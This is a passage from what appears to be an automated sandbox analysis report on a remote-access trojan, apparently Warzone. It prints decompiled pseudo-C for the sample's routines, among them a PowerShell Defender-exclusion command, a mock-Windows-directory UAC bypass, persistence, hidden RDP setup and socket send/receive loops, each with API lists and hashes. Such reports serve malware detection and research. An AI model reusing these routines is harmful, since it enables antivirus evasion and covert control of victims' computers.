                                  				return WinExec(_t21, 0);
                                  			}

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,74A313FB,00000000,004156DE), ref: 00414FAF
                                  • WinExec.KERNEL32 ref: 00414FF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateExecFileModuleNameProcess
                                  • String ID: powershell Add-MpPreference -ExclusionPath
                                  • API String ID: 1183730998-2194938034
                                  • Opcode ID: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction ID: f9242cdbd1c9b696a892a29a9369df0dc44288307f8c57903ac4db52bc2fe90b
                                  • Opcode Fuzzy Hash: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction Fuzzy Hash: E7F062B154025476F22032725CCBFBF566CDF89758F04043BF684B55D2EA7C994141BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004056F5(void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v24;
                                  				void* _t21;
                                  				void* _t38;
                                  				intOrPtr _t39;
                                  				void* _t40;
                                  
                                  				_t37 = __edx;
                                  				_t38 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
                                  					E00403115( &_v24, __edx, E004034D1( &_v12, "warzoneTURBO"));
                                  					_t31 = _v12;
                                  					E00405FEB(_v12);
                                  					_t39 = _a4;
                                  					_t32 = _t40;
                                  					E0040315E(_t40, _t39);
                                  					E0040315E(_t40,  &_v24);
                                  					_t7 =  &_v16; // 0x405062
                                  					_t21 = E004061F0(_t7, _t37, _t40, _t32, _v12, _t31);
                                  					_t9 =  &_v16; // 0x405062
                                  					_t10 = _t38 + 0xc; // 0x415e66
                                  					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
                                  					E00403148( &_v16);
                                  					E00403148( &_v24);
                                  					return 0 | _t21 != 0xffffffff;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID: bP@$warzoneTURBO
                                  • API String ID: 2809346765-1210837753
                                  • Opcode ID: e0b2bafd42701770b9a29c098a03a9d52679123bf580f55750e91a4828fe6913
                                  • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                  • Opcode Fuzzy Hash: e0b2bafd42701770b9a29c098a03a9d52679123bf580f55750e91a4828fe6913
                                  • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0041068D(intOrPtr* _a4) {
                                  				intOrPtr* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				intOrPtr _t7;
                                  				intOrPtr _t11;
                                  				void* _t15;
                                  
                                  				_t3 = _a4;
                                  				_t7 =  *_t3;
                                  				_t11 =  *((intOrPtr*)(_t3 + 8));
                                  				if( *0x426755 != 0) {
                                  					while(1) {
                                  						_t4 = E00401085(0x2000);
                                  						_t13 = _t4;
                                  						__imp__#16(_t11, _t4, 0x1f40, 0);
                                  						if(_t4 == 0xffffffff || _t4 == 0) {
                                  							break;
                                  						}
                                  						E004106F9(_t13, _t4, _t7);
                                  						_t5 = E00401099(_t13);
                                  						_t15 = _t15 + 0xc;
                                  						if( *0x426755 != 0) {
                                  							continue;
                                  						}
                                  						L7:
                                  						return _t5;
                                  					}
                                  					__imp__#3(_t11);
                                  					_t5 = E00401099(_t13);
                                  					goto L7;
                                  				}
                                  				return _t3;
                                  			}

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                  • closesocket.WS2_32(?), ref: 004106E7
                                    • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                  • String ID: <5Ik
                                  • API String ID: 1908950363-1120072674
                                  • Opcode ID: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction ID: cf5c065e532922d4a3d76e571e2bf2fb24ffb7083d1690fd6d685bf59492f6b1
                                  • Opcode Fuzzy Hash: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction Fuzzy Hash: 85F09C716042442EE22063256C4AFFF379CCFC57ACF14016BFA04561E1DAF85CD282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketshutdown
                                  • String ID: <5Ik
                                  • API String ID: 572888783-1120072674
                                  • Opcode ID: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction ID: 284792fdbf7bd6b26f007be0ad5fa8b9be9590e38c7f66b8807de1f76de5a812
                                  • Opcode Fuzzy Hash: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction Fuzzy Hash: 6FD0C931018B109FD7311B14ED0EF92BBB1AB00332F10C65DE8BA444F0C7A06850DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040ECE1(void** __ecx, void** __edx, void* __eflags) {
                                  				void** _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				void* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				intOrPtr _v40;
                                  				char _v100;
                                  				void* _t35;
                                  				void* _t38;
                                  				void* _t62;
                                  
                                  				_v8 = __edx;
                                  				_t62 = 0;
                                  				_v16 =  &_v100;
                                  				_v24 = 0;
                                  				_v12 = 0x426970;
                                  				_v20 = 0x426970;
                                  				_v28 =  *((intOrPtr*)(__ecx + 4));
                                  				if(E0040EE24( &_v16, __ecx, 0x40) != 0 && _v100 == 0x5a4d) {
                                  					_v32 =  *((intOrPtr*)(__ecx)) + _v40;
                                  					_t35 = LocalAlloc(0x40, 0x18);
                                  					_v16 = _t35;
                                  					if(_t35 != 0) {
                                  						E0040EE24( &_v16,  &_v32, 0x18);
                                  						_t44 =  ==  ? 0xf8 : 0x108;
                                  						_t38 = LocalAlloc(0x40,  ==  ? 0xf8 : 0x108);
                                  						_v24 = _t38;
                                  						if(_t38 != 0) {
                                  							_t62 = E0040EE24( &_v24,  &_v32, _t44);
                                  							if(_t62 == 0) {
                                  								LocalFree(_v24);
                                  							} else {
                                  								 *_v8 = _v24;
                                  							}
                                  						}
                                  						LocalFree(_v16);
                                  					}
                                  				}
                                  				return _t62;
                                  			}

                                  APIs
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                    • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                    • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                    • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                    • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                  • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                    • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                    • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  • LocalFree.KERNEL32(?), ref: 0040ED9B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                  • String ID:
                                  • API String ID: 2785045919-0
                                  • Opcode ID: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction ID: 844012893b931533083f36e29c55c77bc0a60c617dbdfc6ad0899e7f9f39f4eb
                                  • Opcode Fuzzy Hash: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction Fuzzy Hash: 32213B71E0020E9BCB10DFAAC9419DEF7B5EF84700F15846BE500BB290EB78AE01CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  C-Code - Quality: 95%
                                  			E004154EB(void* __eflags) {
                                  				char _v592;
                                  				char _v608;
                                  				char _v1120;
                                  				short _v1140;
                                  				char _v1372;
                                  				intOrPtr _v1492;
                                  				char _v1496;
                                  				char _v1508;
                                  				char _v1512;
                                  				char _v1528;
                                  				intOrPtr _v1544;
                                  				intOrPtr _v1548;
                                  				intOrPtr _v1552;
                                  				intOrPtr _v1560;
                                  				intOrPtr _v1568;
                                  				intOrPtr _v1584;
                                  				intOrPtr _v1592;
                                  				char _v1596;
                                  				char _v1600;
                                  				intOrPtr _v1604;
                                  				int _v1608;
                                  				char _v1616;
                                  				char _v1620;
                                  				char _v1624;
                                  				void* _v1628;
                                  				char _v1632;
                                  				char _v1636;
                                  				char _v1648;
                                  				void* __edi;
                                  				void* _t57;
                                  				void* _t100;
                                  				void* _t103;
                                  				CHAR* _t116;
                                  				char* _t123;
                                  				CHAR* _t129;
                                  				void* _t133;
                                  
                                  				_v1616 = 0xa;
                                  				_v1608 = 0;
                                  				E00405D37( &_v1596);
                                  				E00412C11( &_v1508);
                                  				E004010AD(GetTickCount());
                                  				_v1648 = 0x104;
                                  				GetModuleFileNameA(0,  &_v1372, _t129);
                                  				_v1624 = 0;
                                  				_t57 = E004134A2( &_v1372,  &_v1624); // executed
                                  				_t128 = _v1624;
                                  				if(_v1624 == 0) {
                                  					L22:
                                  					E0041267D( &_v1508);
                                  					E00405D5C( &_v1596, _t129);
                                  					return 0;
                                  				} else {
                                  					_v1620 = 0;
                                  					E00413279(_t57, _t128, 0x215a,  &_v1620);
                                  					_t133 = 0x20;
                                  					_t129 = E00401085(_t133);
                                  					_t116 = _t129;
                                  					do {
                                  						 *_t116 = 0;
                                  						_t116 =  &(_t116[1]);
                                  						_t133 = _t133 - 1;
                                  					} while (_t133 != 0);
                                  					E0040102C(_t129,  &_v1620, 4);
                                  					 *0x559cb0 = CreateEventA(0, 0, 0, _t129);
                                  					if(GetLastError() == 0xb7) {
                                  						goto L22;
                                  					}
                                  					_t145 =  *0x559cb0;
                                  					if( *0x559cb0 == 0) {
                                  						goto L22;
                                  					}
                                  					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1628,  &_v1608);
                                  					RegSetValueExA(_v1628, "MaxConnectionsPer1_0Server", 0, 4,  &_v1616, 4);
                                  					RegSetValueExA(_v1628, "MaxConnectionsPerServer", 0, 4,  &_v1616, 4);
                                  					RegCloseKey(_v1628);
                                  					E00405B4E( &_v1596, _t128, _t145);
                                  					E00412A7F( &_v1508, _t128, _t145,  &_v1596);
                                  					_t119 =  &_v592;
                                  					E00405000( &_v592, _t128, _t145,  &_v1600,  &_v1512);
                                  					E00401052( &_v1120, 0, 0x208);
                                  					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120);
                                  					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
                                  					CreateDirectoryW( &_v1140, 0);
                                  					if(_v1568 != 0 && E0041111B() != 1) {
                                  						_t103 = E00410A3C();
                                  						_t148 = _t103 - 0xa;
                                  						if(_t103 != 0xa) {
                                  							E00412F55(__eflags);
                                  						} else {
                                  							E0041313A(_t128, _t148);
                                  						}
                                  					}
                                  					if(_v1552 != 0) {
                                  						_t100 = E0041111B();
                                  						_t150 = _t100 - 1;
                                  						if(_t100 == 1) {
                                  							E00414F7E(_t119, _t150);
                                  						}
                                  					}
                                  					if(_v1548 != 0) {
                                  						E0040F073();
                                  					}
                                  					_t152 = _v1492;
                                  					if(_v1492 != 0) {
                                  						L18:
                                  						__eflags = _v1560;
                                  						if(__eflags != 0) {
                                  							E00413EBA();
                                  						}
                                  						E00404F74( &_v608, _t128, __eflags);
                                  						goto L21;
                                  					} else {
                                  						E004126DC( &_v1528, _t152, _v1592, _v1584, _v1544);
                                  						_t153 = _v1604;
                                  						if(_v1604 == 0) {
                                  							goto L18;
                                  						}
                                  						_v1624 = 0;
                                  						_t123 =  &_v1632;
                                  						E0040373F(_t123,  &_v1496);
                                  						_push(_t123);
                                  						E004120F8( &_v1624, _t153,  &_v1636,  &_v1628);
                                  						E00405FEB(_v1648);
                                  						E00405FEB(0);
                                  						L21:
                                  						E00404C8D( &_v608, _t129, _t153);
                                  						goto L22;
                                  					}
                                  				}
                                  			}
                                  0x004156f0

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041551D
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                  • GetLastError.KERNEL32 ref: 004155AB
                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                  • RegSetValueExA.ADVAPI32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                  • RegSetValueExA.ADVAPI32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                  • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041567B
                                  • lstrcatW.KERNEL32 ref: 0041568E
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041569D
                                    • Part of subcall function 00412F55: CloseHandle.KERNEL32(?), ref: 00412F7F
                                    • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                    • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00412FF7
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00413029
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                    • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                    • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                    • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                  • MaxConnectionsPerServer, xrefs: 00415610
                                  • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                  • \Microsoft Vision\, xrefs: 00415681
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HandleHeapModuleNameSystemWow64$AllocateCountCurrentDisableErrorEventFolderFreeLastPathReadRedirectionSizeTickVirtuallstrcpy
                                  • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                  • API String ID: 651455083-2552559493
                                  • Opcode ID: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                  • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                  • Opcode Fuzzy Hash: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                  • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040E5A3(void* __ecx, void* __edx) {
                                  				char _v8;
                                  				char _v12;
                                  				intOrPtr* _t11;
                                  				void* _t14;
                                  				void* _t15;
                                  				void* _t19;
                                  				void* _t20;
                                  				void* _t25;
                                  				void* _t33;
                                  				void* _t42;
                                  				intOrPtr _t43;
                                  				void* _t67;
                                  				intOrPtr _t71;
                                  				void* _t80;
                                  
                                  				_t67 = __edx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				InitializeCriticalSection(0x55ad18);
                                  				_t71 = 5;
                                  				asm("xorps xmm0, xmm0");
                                  				 *0x55ad68 = _t71;
                                  				 *0x55ad60 = _t71;
                                  				_t42 = 0x18;
                                  				asm("movups [0x55ad30], xmm0");
                                  				 *0x55ad40 = 0;
                                  				asm("movups [0x55ad48], xmm0");
                                  				 *0x55ad58 = 0;
                                  				 *0x55ad64 = 0;
                                  				_t11 = E00406099(_t42);
                                  				_t82 = _t11;
                                  				if(_t11 == 0) {
                                  					_t43 = 0;
                                  				} else {
                                  					 *_t11 = _t71;
                                  					_t1 = _t11 + 4; // 0x4
                                  					_t43 = _t1;
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  				}
                                  				 *0x55ad5c = _t43;
                                  				 *0x55ad74 = 0;
                                  				 *0x55ad78 = 0; // executed
                                  				E00403411(0x55ad40, _t67, L"TermService"); // executed
                                  				E00403411(0x55ad4c, _t67, L"%ProgramFiles%"); // executed
                                  				_t14 = E004036F7( &_v12, L"%windir%\\System32"); // executed
                                  				_t68 = _t14;
                                  				_t15 = E004032E6( &_v8, _t14, _t82); // executed
                                  				E00403549(0x55ad58, _t15); // executed
                                  				E00405FEB(_v8);
                                  				_v8 = 0;
                                  				E00405FEB(_v12);
                                  				_t19 = E00411177(_v12);
                                  				_t83 = _t19 - 1;
                                  				if(_t19 != 1) {
                                  					_t69 = 0x55ad4c;
                                  					_t20 = E004032E6( &_v12, 0x55ad4c, __eflags);
                                  					_t80 = 0x55ad50;
                                  					E00403549(0x55ad50, _t20);
                                  					E00405FEB(_v12);
                                  				} else {
                                  					E00403411(0x55ad4c, _t68, L"%ProgramW6432%"); // executed
                                  					_t69 = 0x55ad4c;
                                  					_t33 = E004032E6( &_v12, 0x55ad4c, _t83); // executed
                                  					_t80 = 0x55ad50;
                                  					E00403549(0x55ad50, _t33); // executed
                                  					E00405FEB(_v12);
                                  					E00403411(0x55ad4c, 0x55ad4c, L"%ProgramFiles%"); // executed
                                  				}
                                  				E0040357C(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
                                  				E0040357C(0x55ad4c, _t69, _t83, L"\\Microsoft DN1"); // executed
                                  				_t25 = E0040357C(0x55ad58, _t69, _t83, L"\\rfxvmt.dll"); // executed
                                  				E00410C3E(_t25, _t80);
                                  				E00403549(0x55ad54, _t80); // executed
                                  				E0040357C(0x55ad54, _t69, _t83, L"\\rdpwrap.ini"); // executed
                                  				E0040357C(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
                                  				E0040357C(0x55ad4c, _t69, _t83, L"\\sqlmap.dll"); // executed
                                  				return 0x55ad18;
                                   			}

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                    • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                  • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                  • API String ID: 2811233055-3289620323
                                  • Opcode ID: 3f53fd247fd4244b76578e31d1b2874747c49d3157bc9deecb40c1ef9b8c9a7c
                                  • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                  • Opcode Fuzzy Hash: 3f53fd247fd4244b76578e31d1b2874747c49d3157bc9deecb40c1ef9b8c9a7c
                                  • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E004148B6(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				signed short* _v36;
                                  				char _v44;
                                  				signed int* _t43;
                                  				intOrPtr* _t47;
                                  				void* _t48;
                                  				intOrPtr* _t50;
                                  				intOrPtr* _t54;
                                  				signed int _t57;
                                  				char _t60;
                                  				signed int _t61;
                                  				intOrPtr* _t63;
                                  				signed int _t64;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t67;
                                  				intOrPtr* _t70;
                                  				intOrPtr* _t71;
                                  				void* _t73;
                                  				signed int _t76;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				signed short* _t88;
                                  
                                  				_t87 = 0;
                                  				_v28 = __ecx;
                                  				__imp__CoInitialize(0); // executed
                                  				_t43 =  &_v12;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				__imp__CoCreateInstance(0x417600, 0, 1, 0x41a77c, _t43); // executed
                                  				_t66 = _v12;
                                  				if(_t66 != 0) {
                                  					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4175f0,  &_v8, 0);
                                  					_t67 = _v8;
                                  					if(_t67 != 0) {
                                  						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
                                  						_t64 = 0;
                                  						while(1) {
                                  							_t47 = _v8;
                                  							_t34 =  &_v24; // 0x414222
                                  							_v20 = _t87;
                                  							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1, _t34,  &_v20);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							_t11 =  &_v24; // 0x414222
                                  							_t50 =  *_t11 + _t64 * 4;
                                  							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x417580,  &_v16);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							__imp__#8( &_v44);
                                  							_t54 = _v16;
                                  							_push(_t87);
                                  							_push( &_v44);
                                  							_push(L"Description");
                                  							_push(_t54);
                                  							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
                                  								L6:
                                  								_t73 = 0x1c;
                                  								if(E00406099(_t73) == 0) {
                                  									_t85 = _t87;
                                  								} else {
                                  									_t85 = E00414B6E(_t56);
                                  								}
                                  								_t88 = _v36;
                                  								_t57 =  *_t88 & 0x0000ffff;
                                  								if(_t57 == 0) {
                                  									L12:
                                  									 *(_t85 + 8) = _t64;
                                  									E00402503(_v28 + 4, _t85);
                                  									_t64 = _t64 + 1;
                                  									_t87 = 0;
                                  									continue;
                                  								} else {
                                  									_t76 = _t57;
                                  									do {
                                  										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
                                  										_t60 =  *_t88;
                                  										_t88 =  &(_t88[1]);
                                  										 *((char*)(_t87 +  *_t85)) = _t60;
                                  										_t87 = _t87 + 1;
                                  										_t61 =  *_t88 & 0x0000ffff;
                                  										_t76 = _t61;
                                  									} while (_t61 != 0);
                                  									goto L12;
                                  								}
                                  							}
                                  							_t63 = _v16;
                                  							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
                                  							if(_t48 != 0) {
                                  								break;
                                  							}
                                  							goto L6;
                                  						}
                                  						_t70 = _v8;
                                  						if(_t70 != 0) {
                                  							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
                                  							_v8 = _t87;
                                  						}
                                  						_t71 = _v12;
                                  						if(_t71 != 0) {
                                  							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
                                  							_v12 = _t87;
                                  						}
                                  						__imp__CoUninitialize();
                                  						return _t48;
                                  					}
                                  				}
                                  				return _t43;
                                   			}

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004148C5
                                  • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 004148E5
                                  • VariantInit.OLEAUT32(?), ref: 00414941
                                  • CoUninitialize.OLE32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInitInitializeInstanceUninitializeVariant
                                  • String ID: "BA$Description$FriendlyName
                                  • API String ID: 4142528535-3217936966
                                  • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                  • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                  • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
